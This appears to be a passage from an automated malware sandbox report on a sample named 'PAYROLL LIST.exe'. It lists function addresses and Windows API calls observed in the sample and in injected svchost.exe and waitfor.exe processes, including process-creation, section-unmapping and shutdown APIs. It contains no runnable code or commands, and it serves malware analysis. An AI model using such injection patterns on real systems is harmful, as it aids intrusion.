Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962FA0 NtQuerySection,	5_2_04962FA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962F60 NtCreateProcessEx,	5_2_04962F60
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962AB0 NtWaitForSingleObject,	5_2_04962AB0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04962B80 NtQueryInformationFile,	5_2_04962B80
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04963090 NtSetValueKey,	5_2_04963090
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04963010 NtOpenDirectoryObject,	5_2_04963010
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04963D10 NtOpenProcessToken,	5_2_04963D10
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04963D70 NtOpenThread,	5_2_04963D70
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02769750 NtCreateFile,	5_2_02769750
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02769A40 NtClose,	5_2_02769A40
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02769B90 NtAllocateVirtualMemory,	5_2_02769B90
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027698B0 NtReadFile,	5_2_027698B0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027699A0 NtDeleteFile,	5_2_027699A0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047EF1F6 NtQueryInformationProcess,	5_2_047EF1F6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047EF9CB NtUnmapViewOfSection,	5_2_047EF9CB

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A66685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00A66685

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A5ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00A5ACC5

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00A679D3

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A4B043	0_2_00A4B043
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5410F	0_2_00A5410F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A402A4	0_2_00A402A4
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A2E3B0	0_2_00A2E3B0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5038E	0_2_00A5038E
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A406D9	0_2_00A406D9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5467F	0_2_00A5467F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A8AACE	0_2_00A8AACE
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A54BEF	0_2_00A54BEF
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A4CCC1	0_2_00A4CCC1
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A26F07	0_2_00A26F07
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A2AF50	0_2_00A2AF50
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A831BC	0_2_00A831BC
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A4D1B9	0_2_00A4D1B9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A3B11F	0_2_00A3B11F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A4123A	0_2_00A4123A
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A33200	0_2_00A33200
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5724D	0_2_00A5724D
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A293F0	0_2_00A293F0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A613CA	0_2_00A613CA
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A3F563	0_2_00A3F563
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A296C0	0_2_00A296C0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6B6CC	0_2_00A6B6CC
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A277B0	0_2_00A277B0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A8F7FF	0_2_00A8F7FF
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A579C9	0_2_00A579C9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A3FA57	0_2_00A3FA57
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A29B60	0_2_00A29B60
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A33B70	0_2_00A33B70
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A27D19	0_2_00A27D19
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A49ED0	0_2_00A49ED0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A3FE6F	0_2_00A3FE6F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A27FA3	0_2_00A27FA3
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00BAA1F0	0_2_00BAA1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418ED3	2_2_00418ED3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004170DE	2_2_004170DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004170E3	2_2_004170E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E903	2_2_0040E903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410913	2_2_00410913
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404924	2_2_00404924
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011F0	2_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040EA47	2_2_0040EA47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040EA53	2_2_0040EA53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403300	2_2_00403300
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CC0	2_2_00401CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CB9	2_2_00401CB9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F5C3	2_2_0042F5C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E20	2_2_00401E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402623	2_2_00402623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402630	2_2_00402630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004106ED	2_2_004106ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004106F3	2_2_004106F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034003E6	2_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C02C0	2_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330100	2_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034001AA	2_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F81CC	2_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364750	2_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C6E0	2_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03400591	2_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4420	2_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F2446	2_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EE4F6	2_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F6BD7	2_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340A9A6	2_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334A840	2_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033268B8	2_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E8F0	2_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360F30	2_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E2F30	2_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03382F28	2_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4F40	2_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BEFA0	2_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334CFE0	2_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332FC8	2_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEE26	2_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340E59	2_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352E90	2_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FCE93	2_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEEDB	2_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DCD1F	2_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334AD00	2_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03358DBF	2_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333ADE0	2_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340C00	2_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0CB5	2_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330CF2	2_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F132D	2_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332D34C	2_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0338739A	2_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033452A0	2_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E12ED	2_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B2C0	2_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340B16B	2_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332F172	2_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337516C	2_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334B1B0	2_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F70E9	2_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF0E0	2_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EF0CC	2_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033470C0	2_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF7B0	2_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F16CC	2_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7571	2_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DD5B0	2_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF43F	2_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03331460	2_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFB76	2_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FB80	2_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B5BF0	2_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337DBF9	2_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B3A6C	2_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFA49	2_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7A46	2_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DDAAC	2_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385AA0	2_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E1AA3	2_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EDAC6	2_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D5910	2_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349950	2_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B950	2_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AD800	2_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033438E0	2_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFF09	2_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFFB1	2_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03341F92	2_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303FD2	2_2_03303FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303FD5	2_2_03303FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349EB0	2_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7D73	2_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F1D5A	2_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03343D40	2_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FDC0	2_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B9C32	2_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFCF2	2_2_033FFCF2
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049DE4F6	5_2_049DE4F6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D4420	5_2_049D4420
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E2446	5_2_049E2446
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049F0591	5_2_049F0591
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04930535	5_2_04930535
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0494C6E0	5_2_0494C6E0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0492C7C0	5_2_0492C7C0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04954750	5_2_04954750
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04930770	5_2_04930770
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049C2000	5_2_049C2000
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049F01AA	5_2_049F01AA
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E41A2	5_2_049E41A2
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E81CC	5_2_049E81CC
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049CA118	5_2_049CA118
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04920100	5_2_04920100
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049B8158	5_2_049B8158
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049B02C0	5_2_049B02C0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D0274	5_2_049D0274
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0493E3F0	5_2_0493E3F0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049F03E6	5_2_049F03E6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EA352	5_2_049EA352
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D0CB5	5_2_049D0CB5
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04920CF2	5_2_04920CF2
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04930C00	5_2_04930C00
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04948DBF	5_2_04948DBF
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0492ADE0	5_2_0492ADE0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049CCD1F	5_2_049CCD1F
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0493AD00	5_2_0493AD00
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04942E90	5_2_04942E90
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049ECE93	5_2_049ECE93
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EEEDB	5_2_049EEEDB
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EEE26	5_2_049EEE26
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04930E59	5_2_04930E59
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049AEFA0	5_2_049AEFA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04922FC8	5_2_04922FC8
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0493CFE0	5_2_0493CFE0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04950F30	5_2_04950F30
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D2F30	5_2_049D2F30
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04972F28	5_2_04972F28
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049A4F40	5_2_049A4F40
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049168B8	5_2_049168B8
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0495E8F0	5_2_0495E8F0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0493A840	5_2_0493A840
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04932840	5_2_04932840
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049329A0	5_2_049329A0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049FA9A6	5_2_049FA9A6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04946962	5_2_04946962
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0492EA80	5_2_0492EA80
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E6BD7	5_2_049E6BD7
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EAB40	5_2_049EAB40
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EF43F	5_2_049EF43F
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04921460	5_2_04921460
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049CD5B0	5_2_049CD5B0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E7571	5_2_049E7571
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E16CC	5_2_049E16CC
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EF7B0	5_2_049EF7B0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049DF0CC	5_2_049DF0CC
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049370C0	5_2_049370C0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E70E9	5_2_049E70E9
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EF0E0	5_2_049EF0E0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0493B1B0	5_2_0493B1B0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0491F172	5_2_0491F172
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049FB16B	5_2_049FB16B
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0496516C	5_2_0496516C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049352A0	5_2_049352A0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0494B2C0	5_2_0494B2C0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D12ED	5_2_049D12ED
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0497739A	5_2_0497739A
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E132D	5_2_049E132D
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0491D34C	5_2_0491D34C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EFCF2	5_2_049EFCF2
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049A9C32	5_2_049A9C32
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0494FDC0	5_2_0494FDC0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E1D5A	5_2_049E1D5A
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04933D40	5_2_04933D40
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E7D73	5_2_049E7D73
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04939EB0	5_2_04939EB0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04931F92	5_2_04931F92
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EFFB1	5_2_049EFFB1
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EFF09	5_2_049EFF09
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049338E0	5_2_049338E0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0499D800	5_2_0499D800
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049C5910	5_2_049C5910
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04939950	5_2_04939950
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0494B950	5_2_0494B950
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049CDAAC	5_2_049CDAAC
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_04975AA0	5_2_04975AA0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049D1AA3	5_2_049D1AA3
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049DDAC6	5_2_049DDAC6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EFA49	5_2_049EFA49
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049E7A46	5_2_049E7A46
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049A3A6C	5_2_049A3A6C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0494FB80	5_2_0494FB80
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049A5BF0	5_2_049A5BF0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0496DBF9	5_2_0496DBF9
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049EFB76	5_2_049EFB76
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027522A0	5_2_027522A0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0276C040	5_2_0276C040
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027413A1	5_2_027413A1
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274D390	5_2_0274D390
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274B380	5_2_0274B380
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274D170	5_2_0274D170
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274D16A	5_2_0274D16A
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274B4D0	5_2_0274B4D0
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274B4C4	5_2_0274B4C4
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02753B60	5_2_02753B60
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02753B5B	5_2_02753B5B
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02755950	5_2_02755950
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047EE475	5_2_047EE475
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047EE354	5_2_047EE354
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047EE80C	5_2_047EE80C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047ED8D8	5_2_047ED8D8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 102 times
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: String function: 00A4F8A0 appears 35 times
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: String function: 00A46AC0 appears 42 times
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: String function: 00A3EC2F appears 68 times
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: String function: 049AF290 appears 105 times
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: String function: 04977E54 appears 102 times
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: String function: 0499EA12 appears 86 times
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: String function: 0491B970 appears 280 times
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: String function: 04965130 appears 58 times

Source: PAYROLL LIST.exe, 00000000.00000003.2127501739.000000000365D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYROLL LIST.exe
